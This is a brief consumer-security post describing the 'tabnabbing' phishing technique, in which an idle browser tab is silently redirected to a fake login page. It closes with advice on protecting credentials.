One of the latest phishing vessels to set sail has been christened “Tabnabbing” by web designer Aza Raskin. Here’s how they catch you: Let’s say you visit an infected website. The malicious agent will wait, biding its time until you open a new tab or minimize your browser window. When you’re not looking your window will then be redirected to a carefully crafted copy of say, Bank of America, Facebook, Hotmail, etc. Unwittingly, you think you’ve just left a tab open, you enter your credentials and just like that they have your info. The truly alarming part is it’s possible to detect the sites you frequent (even sites you’re currently logged into), making the threat far more targeted and potentially successful. Raskin’s article is actually a working example of this technique, though the user name and password fields on the fake phishing page will not let you enter any information.
Since the attack comes from compromised websites the virus needs not infect your own computer. It uses javascript on the web page itself to redirect your browser. This renders your anti-virus useless in this scenario. The forthcoming Account Manager for Firefox promises to prevent this and other phishing threats, but it is still in beta testing. For now your best bet is to always start with a new browser tab/window when you’re about to enter sensitive information and close any windows/tabs you’re finished with.